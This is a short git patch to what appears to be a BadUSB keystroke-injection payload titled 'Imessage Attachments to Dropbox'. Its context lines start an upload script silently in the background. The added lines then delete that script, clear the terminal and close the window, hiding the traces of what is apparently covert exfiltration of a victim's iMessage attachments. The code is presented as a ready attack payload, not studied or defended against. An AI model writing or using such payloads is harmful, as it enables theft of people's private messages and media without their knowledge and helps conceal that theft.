From 16c64e4b4bdd72a36eb1f39c755a155a9e58767d Mon Sep 17 00:00:00 2001 From: Narstybits Date: Sat, 17 Jun 2023 08:23:23 -0500 Subject: [PATCH] added STRING clear and the removal of the upload script for Imessage Attach to dropbox --- Executions/Imessage Attachments to Dropbox.txt | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/Executions/Imessage Attachments to Dropbox.txt b/Executions/Imessage Attachments to Dropbox.txt index 046a005..bf74fa8 100644 --- a/Executions/Imessage Attachments to Dropbox.txt +++ b/Executions/Imessage Attachments to Dropbox.txt @@ -57,8 +57,16 @@ DELAY 500 STRING nohup ./upload.sh >/dev/null 2>&1 & DELAY 500 ENTER +DELAY 2000 +CTRL C +DELAY 500 +STRING rm upload.sh DELAY 500 -GUI k +ENTER +DELAY 500 +STRING CLEAR +DELAY 500 +ENTER DELAY 500 GUI w DELAY 500